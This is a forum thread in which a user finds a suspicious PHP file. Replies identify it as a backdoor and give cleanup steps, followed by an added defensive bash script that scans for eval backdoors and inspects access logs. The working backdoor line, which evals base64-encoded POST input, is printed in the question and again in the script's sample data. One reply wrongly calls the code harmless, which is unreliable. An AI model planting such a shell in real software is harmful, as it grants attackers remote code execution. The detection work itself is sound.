maybe hacking

Discussions about server security -- questions and answers

Moderators: macek, egami, gesf

wawawe
New php-forum User
Posts: 1
Joined: Wed Nov 30, 2011 1:22 am

maybe hacking

Postby wawawe » Wed Nov 30, 2011 1:45 am

Hi,

I have a file thumbs.php on my server and this is the content of it:

Code:

<?php if(md5($_POST["password"])=="beb89daa79e6174f2ca4288"){eval(base64_decode($_POST["code"]));} ?>


Is this hacking?

If yes, how can I resolve it?

Regards

wawawe

kc0pph
New php-forum User
Posts: 86
Joined: Sat Nov 26, 2011 8:39 am
Location: Pueblo, CO

Re: maybe hacking

Postby kc0pph » Fri Dec 02, 2011 9:48 pm

This looks like a hard-coded password.

md5 is a hash technology that encrypts things. So it's saying if the md5 of the password entered in = the stored value then do the code below. I'm not 100% sure about what the "code below" does, but it does not send any data to anyone else.

TheProdigyGuy
New php-forum User
Posts: 215
Joined: Wed Dec 07, 2011 5:25 pm

Re: maybe hacking

Postby TheProdigyGuy » Mon Dec 12, 2011 6:37 pm

Yes, it is probably a backdoor.
eval()+base64().
And that 'scriptkiddie' evaluates his string as PHP code on your site.
So, he can wget new 'fresh' exploits to the server + bypass the server's security + can DDoS other sites + SPAM using your site.
Investigate from where and when that backdoor was uploaded to your site.
Check your access and error logs.
Just do it from SSH.
zgrep 'thatfilename' *.*|less
grep -r 'thatfilename' *.*|less
Then trace that IP.
I recommend you remove all files from your site and update your software, because it may contain a backdoor. Shells like r57, c99, wso, etc. etc.
Also do not forget to change your MySQL user name + MySQL password + change all your passwords (FTP, cPanel, MySQL),
your mail passwords + secret questions, etc. etc.
And finally, make sure your hosting is correctly administered.
In some cases, maybe your script is not vulnerable but your hosting may be vulnerable to 'bypassing' attacks.
So, be careful.
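
Added example, not part of any post in this thread: a sketch of the two checks suggested above, finding PHP files that eval() request input the way thumbs.php does and listing which client IPs sent POST requests to such a file. It goes slightly beyond the posted one-liner by also matching $_GET, $_REQUEST and $_COOKIE; the function names, the "combined" access-log format and all sample data are assumptions constructed for the example.

```bash
#!/usr/bin/env bash
# Added example, not from the thread. Log format and all sample data are constructed.

# List PHP files that eval() request input directly or through base64_decode().
find_eval_backdoors() {  # usage: find_eval_backdoors WEBROOT
  grep -rlE --include='*.php' \
    'eval[[:space:]]*\([[:space:]]*(base64_decode[[:space:]]*\([[:space:]]*)?\$_(POST|GET|REQUEST|COOKIE)' \
    "$1" | sort
}

# Per client IP, count POSTs to FILENAME and show the first timestamp seen.
# Assumes Apache/nginx "combined" log lines; reads rotated .gz logs too.
posts_to_file() {  # usage: posts_to_file LOGFILE FILENAME
  case "$1" in *.gz) gzip -dc -- "$1" ;; *) cat -- "$1" ;; esac |
  awk -v name="$2" '
    { path = $7; sub(/[?].*/, "", path); sub(/.*\//, "", path) }
    $6 == "\"POST" && path == name {
      if (!($1 in n)) first[$1] = substr($4, 2)
      n[$1]++
    }
    END { for (ip in n) print n[ip], ip, first[ip] }' | sort -rn
}

# Build a constructed web root and access log to run the two checks against.
make_sample() {  # usage: make_sample DIR
  mkdir -p "$1/www/img"
  cat > "$1/www/img/thumbs.php" <<'EOF'
<?php if(md5($_POST["password"])=="beb89daa79e6174f2ca4288"){eval(base64_decode($_POST["code"]));} ?>
EOF
  echo '<?php echo md5("hello"); ?>' > "$1/www/index.php"
  cat > "$1/access.log" <<'EOF'
192.0.2.10 - - [29/Nov/2011:03:12:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [29/Nov/2011:03:14:40 +0000] "POST /img/thumbs.php HTTP/1.1" 200 0 "-" "-"
198.51.100.7 - - [29/Nov/2011:03:15:02 +0000] "POST /img/thumbs.php HTTP/1.1" 200 0 "-" "-"
203.0.113.5 - - [29/Nov/2011:04:00:00 +0000] "GET /img/thumbs.php HTTP/1.1" 200 0 "-" "-"
EOF
}

demo=$(mktemp -d)
make_sample "$demo"
find_eval_backdoors "$demo/www"               # files to quarantine and inspect
posts_to_file "$demo/access.log" thumbs.php   # count, client IP, first POST seen
rm -rf "$demo"
```

The earliest POST timestamp per IP gives a starting point for searching older logs for the request that first placed the file.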

